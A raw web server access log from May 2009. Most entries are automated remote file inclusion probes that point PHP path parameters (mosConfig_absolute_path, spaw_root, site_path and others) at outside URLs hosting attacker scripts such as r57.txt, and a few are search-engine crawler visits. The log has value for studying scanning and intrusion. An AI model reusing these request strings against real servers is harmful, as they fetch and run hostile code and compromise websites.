88.191.103.144 - - [17/May/2009:01:15:13 -0500] "GET /logs/access_log.1237593600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:01:15:13 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:01:15:13 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:01:16:03 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:01:16:03 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:01:16:03 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:01:16:08 -0500] "GET /logs/access_log.1240444800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.59.178 - - [17/May/2009:01:16:37 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:16:52 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:16:52 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:16:52 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:17:19 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.249.67.180 - - [17/May/2009:01:17:25 -0500] "GET /logs/access_log.1220054400 HTTP/1.1" 200 1634 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.214.86.93 - - [17/May/2009:01:18:00 -0500] "GET //include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:18:00 -0500] "GET /logs//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:18:00 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:18:05 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:01:18:25 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:01:18:49 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:19:10 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:19:10 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:19:10 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:19:10 -0500] "GET /logs/access_log.1230249600//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:32 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:33 -0500] "GET /logs/access_log.1233100800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:33 -0500] "GET /logs/access_log.1238976000//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:36 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:46 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:46 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:46 -0500] "GET /logs/access_log.1236643200//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:01:19:48 -0500] "GET /logs/access_log.1233964800//install/install3.php?database=none&cabsolute_path=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:01:19:56 -0500] "GET /logs/access_log.1237593600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:01:19:56 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:01:19:56 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:20:03 -0500] "GET /logs/access_log.1234310400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:20:04 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:20:08 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:20:22 -0500] "GET /logs/access_log.1230249600//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.2 - - [17/May/2009:01:22:58 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-blacklist.net/alditor/bin1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:25:49 -0500] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:25:49 -0500] "GET /logs/access_log.1234310400//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:25:51 -0500] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:26:19 -0500] "GET /logs/access_log.1230249600//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:01:27:39 -0500] "GET /logs/access_log.1240444800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:29:41 -0500] "GET //appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:29:41 -0500] "GET /logs//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:29:41 -0500] "GET /logs/access_log.1232064000//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:30:04 -0500] "GET /logs/access_log.1238889600//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:30:45 -0500] "GET //appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:30:45 -0500] "GET /logs//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:30:45 -0500] "GET /logs/access_log.1232064000//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.32.210.206 - - [17/May/2009:01:30:46 -0500] "GET /logs/access_log.1238889600//appserv/errors.php?error=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.107.179 - - [17/May/2009:01:37:32 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.45.249.2 - - [17/May/2009:01:44:42 -0500] "GET /logs/phplive/setup/header.php?css_path=http://dmgxp.com/c?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
66.45.249.2 - - [17/May/2009:01:44:43 -0500] "GET /phplive/setup/header.php?css_path=http://dmgxp.com/c?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
66.249.67.180 - - [17/May/2009:01:51:05 -0500] "GET /logs/access_log.1111795200 HTTP/1.1" 200 678 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.150.79.146 - - [17/May/2009:01:52:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:01:52:26 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:01:52:26 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.208.139 - - [17/May/2009:01:52:26 -0500] "GET /logs/access_log.1224806400 HTTP/1.1" 200 91365 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [17/May/2009:01:52:30 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 200 21975 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.150.79.146 - - [17/May/2009:01:52:57 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:01:52:58 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:01:52:58 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.248.106.226 - - [17/May/2009:01:56:24 -0500] "GET /logs//add.php?APB_rp=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
89.248.106.226 - - [17/May/2009:01:56:26 -0500] "GET //add.php?APB_rp=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
209.151.224.239 - - [17/May/2009:01:57:17 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.823"
209.151.224.239 - - [17/May/2009:01:57:17 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.823"
66.249.67.180 - - [17/May/2009:02:02:18 -0500] "GET /logs/access_log.1143590400 HTTP/1.1" 200 816 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.117 - - [17/May/2009:02:05:06 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.117 - - [17/May/2009:02:05:59 -0500] "GET /logs/access_log.1146700800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.239.76.25 - - [17/May/2009:02:10:09 -0500] "GET /?custompluginfile[]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.76.25 - - [17/May/2009:02:10:09 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.76.25 - - [17/May/2009:02:10:11 -0500] "GET /logs/?custompluginfile[]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 200 189698 "-""Mozilla/5.0"
209.175.180.194 - - [17/May/2009:02:16:05 -0500] "GET //path/theme/format.php?_page_content=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:16:10 -0500] "GET /logs//path/theme/format.php?_page_content=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:16:10 -0500] "GET //path/theme/format.php?_page_content=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
65.55.208.130 - - [17/May/2009:02:21:04 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.130 - - [17/May/2009:02:21:04 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 200 10838 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
217.18.76.16 - - [17/May/2009:02:25:00 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
217.18.76.16 - - [17/May/2009:02:25:00 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [17/May/2009:02:25:00 -0500] "GET /logs/access_log.1239580800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.top-master.nsk.ru/awstats/cgi-bin/lang/tooltips_w/id.txt??? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
88.191.103.144 - - [17/May/2009:02:28:36 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:02:28:36 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:02:28:36 -0500] "GET //include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:02:28:56 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:02:29:36 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:02:29:37 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
65.55.106.170 - - [17/May/2009:02:30:44 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.170 - - [17/May/2009:02:31:29 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.227.193.198 - - [17/May/2009:02:34:44 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:02:34:45 -0500] "GET //include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:02:34:45 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:02:34:49 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:02:37:20 -0500] "GET //include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:02:37:26 -0500] "GET /logs//include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:02:37:26 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:02:37:29 -0500] "GET /logs/access_log.1232150400//include/lib.inc.php?site_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.129.119.16 - - [17/May/2009:02:38:04 -0500] "GET /logs/access_log.1239494400 HTTP/1.0" 200 368715 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.175.180.194 - - [17/May/2009:02:38:09 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:38:09 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:38:09 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:38:09 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
62.44.79.35 - - [17/May/2009:02:38:26 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:02:38:26 -0500] "GET /logs/access_log.1235865600//index.php?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:02:38:26 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
209.175.180.194 - - [17/May/2009:02:39:11 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
209.175.180.194 - - [17/May/2009:02:39:11 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.masuccessguy.com//docs/pifsystem??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
62.44.79.35 - - [17/May/2009:02:55:39 -0500] "GET ////////?custompluginfile%5B%5D=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 3251 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:02:55:39 -0500] "GET /logs////////?custompluginfile%5B%5D=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 189709 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:02:55:44 -0500] "GET /logs/access_log.1235779200////////?custompluginfile%5B%5D=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.225.211.159 - - [17/May/2009:02:56:53 -0500] "GET /logs/errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.820"
66.225.211.159 - - [17/May/2009:02:56:53 -0500] "GET /errors.php?error=http://www.contascatti.com/inc/idp8.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.820"
174.133.58.242 - - [17/May/2009:02:57:17 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://www.google.ca/search?hl=en&q=Transmitter&btnG=Google+Search&meta=cr%3DcountryCA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M; SV1; .NET CLR 1.1.4322)"
66.249.67.180 - - [17/May/2009:02:58:16 -0500] "GET /logs/access_log.1158710400 HTTP/1.1" 200 782 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.44.45 - - [17/May/2009:02:59:24 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.63"
222.236.44.45 - - [17/May/2009:02:59:25 -0500] "GET /skin/zero_vote/login.php?dir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.63"
121.254.229.131 - - [17/May/2009:02:59:41 -0500] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.254.229.131 - - [17/May/2009:02:59:45 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.254.229.131 - - [17/May/2009:02:59:45 -0500] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.254.229.131 - - [17/May/2009:02:59:45 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
85.12.31.79 - - [17/May/2009:03:10:21 -0500] "GET /logs/phplive/setup/header.php?css_path=http://dmgxp.com/c? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
85.12.31.79 - - [17/May/2009:03:10:21 -0500] "GET /phplive/setup/header.php?css_path=http://dmgxp.com/c? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
217.13.127.95 - - [17/May/2009:03:12:33 -0500] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:33 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:34 -0500] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:34 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:55 -0500] "GET //include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:56 -0500] "GET /logs//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:56 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:03:12:57 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.122.26.5 - - [17/May/2009:03:28:14 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.122.26.5 - - [17/May/2009:03:28:14 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
